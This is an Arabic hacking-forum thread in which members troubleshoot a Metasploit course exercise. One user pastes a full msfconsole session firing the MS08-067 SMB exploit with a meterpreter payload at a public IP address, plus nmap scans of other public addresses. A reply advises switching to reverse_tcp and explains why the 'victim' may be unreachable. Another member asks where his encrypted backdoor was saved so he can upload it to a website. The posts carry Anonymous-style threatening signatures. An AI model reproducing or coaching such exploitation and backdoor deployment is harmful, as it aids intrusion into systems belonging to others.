المشاركة الأصلية كتبت بواسطة sparo ههههههه يقصد قافل ...!!! تحياتي وننتظر الجديد من دورة الميتا لطرح الاستفسارات اذا لزمنا تحياتي على الابداع المتواصل ايمن .. ههههههههههههههه يسلموا على التصحيح
Do not challenge someone who has nothing to lose We are Anonymous We are Legion We do not forgive We do not forget Expect us
رد على الرسايل
^^^ ردك مكانه غلط :]
Team Anony.Ha4xploit f.b.com/anony.ha4xploit
اخي انا فتحت البورت 4444 في الباك تراك وفتحت البورت بجدار الحماية والفيروتشل نيتورك وعطيت الباك تراك ايبي حقيقي وفتحت البورت بل رواتر وفعلت ال dmz ولكن هذا الخطأ مسمتر عندي msf> use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set LHOST 31.9.136.7 LHOST => 31.9.136.7 msf exploit(ms08_067_netapi) > set RPORT 445 RPORT => 445 msf exploit(ms08_067_netapi) > set LPORT 4444 LPORT => 4444 msf exploit(ms08_067_netapi) > set RHOST 31.9.229.181 RHOST => 31.9.229.181 msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp msf exploit(ms08_067_netapi) > set SMBPIPE BROWSER SMBPIPE => BROWSER msf exploit(ms08_067_netapi) > set TARGET 0 TARGET => 0 msf exploit(ms08_067_netapi) > exploit -j[*] Exploit running as background job.[*] Started bind handler [-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (31.9.229.181:445) وانا جربت غير ثغرة وجربت عل ارميتاج وجربت عل ميتاسبلوت بدون الوجهة الرسومية ولكن الخطأ اسمتر واداة nmap ماعم تفحص الايبي وعم تعطي هي النتيجة دايما ممكن اعرف المشكلة وين بل ضبط ﻷحلها وهذا الخطأ تبع ال nmap nmap -O 31.9.216.80 Starting Nmap 6.01 ( http://nmap.org ) at 2013-03-21 18:34 EET Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn Nmap done: 1 IP address (0 hosts up) scanned in 3.58 seconds
التعديل الأخير تم بواسطة dark prince ; 03-21-2013 الساعة 07:37 PM
لـن نرحم الضعفاء حتى يصبحوا اقوياء واذا اصبحوا اقوياء فلن تجوز الرحمة عليهم اذا مدت يدك لتمسني سأرفع قبعتي احتراماً لشجاعتك ولكن تأكد اني لن أنزلها إلا على قبرك يوجد ايميلات ثلاثية للمبادلة
المشاركة الأصلية كتبت بواسطة dark prince اخي انا فتحت البورت 4444 في الباك تراك وفتحت البورت بجدار الحماية والفيروتشل نيتورك وعطيت الباك تراك ايبي حقيقي وفتحت البورت بل رواتر وفعلت ال dmz ولكن هذا الخطأ مسمتر عندي msf> use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set LHOST 31.9.136.7 LHOST => 31.9.136.7 msf exploit(ms08_067_netapi) > set RPORT 445 RPORT => 445 msf exploit(ms08_067_netapi) > set LPORT 4444 LPORT => 4444 msf exploit(ms08_067_netapi) > set RHOST 31.9.229.181 RHOST => 31.9.229.181 msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp msf exploit(ms08_067_netapi) > set SMBPIPE BROWSER SMBPIPE => BROWSER msf exploit(ms08_067_netapi) > set TARGET 0 TARGET => 0 msf exploit(ms08_067_netapi) > exploit -j[*] Exploit running as background job.[*] Started bind handler [-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (31.9.229.181:445) واداة nmap ماعم تفحص الايبي وعم تعطي هي النتيجة دايما ممكن اعرف المشكلة وين بل ضبط ﻷحلها وهذا الخطأ تبع ال nmap nmap -O 31.9.216.80 Starting Nmap 6.01 ( http://nmap.org ) at 2013-03-21 18:34 EET Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn Nmap done: 1 IP address (0 hosts up) scanned in 3.58 seconds المهم حبيبي انا راح أشرح لك اولا عند استعمال البايلاد استعمل reverse_tcp اوكي هاذي اول شئ و يعود عدم وجود الضحية الى الاسباب التالية انك مو عامل brideg في الماشين المهم او يكون البورت 455 مرقع عند الضحية ... يكون الفيروول عندك او عند الضحية شغال انا انصحك حبيبي لتفادي كل هذه المششاكل استعمل الميتاسبلويت في الوندوز مثلي و ريح حالك تحياتي بخصوص النماب افحص كاتالي افضل بالامر db_nmap xxx.xxx.xxx.xxx أو nmap -s xxx.xxx.xxx.xxx $المهم هناك اوامر كثيرة بالتوفيق...........
اخي انا بدي اتعلم الباك تراك لهك بديها تزبط معي بل باك تراك اخي في فيديو بيشرح العملية الي عم تحكي عنها من اولها ﻷخرها و الdb_nmap الامر الي عطيتني ماشتغل عطاني الامر غير موجود والامر التاني nmap -s عطاني هيكnmap -S 31.9.145.9 WARNING: If -S is being used to fake your source address, you may also have to use -e <interface> and -Pn . If you are using it to specify your real source address, you can ignore this warning. Starting Nmap 6.01 ( http://nmap.org ) at 2013-03-21 18:48 EET Could not figure out what device to send the packet out on with the source address you gave me! If you are trying to sp00f your scan, this is normal, just give the -e eth0 or -e ppp0 or whatever. Otherwise you can still use -e, but I find it kindof fishy. QUITTING! اخي بعرف عم عذبك معي بس البورت فتح وماعم يزبط معي الاستغلال ليش ماعم اعرف وعامل بريدج بل مشاين كلو تمام
يلزمك قاعدة بيانات حيببيبي انشاء االه راح أشرح الشغلة في الدروس القادمة
سلامات يا ايمن الغالي كان عندي استفسار بخصوص الدرس الخامس لصناعة الباكدور وتشفيره انو انا مشيت معك بالدرس بس وين بدي الاقي الباكدور مشان ارفعه على شي موقع ما عم اعرف وين الباكدور ..؟؟؟
لا علاقة للنضج بالأيام ... نحن نكبر بمرور الأوغاد .!! *******مع تحياتي SpAroOo
المشاركة الأصلية كتبت بواسطة sparo سلامات يا ايمن الغالي كان عندي استفسار بخصوص الدرس الخامس لصناعة الباكدور وتشفيره انو انا مشيت معك بالدرس بس وين بدي الاقي الباكدور مشان ارفعه على شي موقع ما عم اعرف وين الباكدور ..؟؟؟ اخي حسب الشرح انت بتحدد مكان حفظ الباكدور من الخيار الاول output path من هون بتحدد مكان حفظ الباك دور ارجو ان اكون قد افدتك واعتذر من الاخ ايمن على تدخلي طبعاً الاخ ايمن الو فضل كبير علي وانا بقدرو وبشكرو
المشاركة الأصلية كتبت بواسطة dark prince اخي حسب الشرح انت بتحدد مكان حفظ الباكدور من الخيار الاول output path من هون بتحدد مكان حفظ الباك دور ارجو ان اكون قد افدتك واعتذر من الاخ ايمن على تدخلي طبعاً الاخ ايمن الو فضل كبير علي وانا بقدرو وبشكرو مشكور حبيبي و لا داعي للاعتذار بل تستحق الشكر لمساعدتي تحياتي
قوانين المنتدى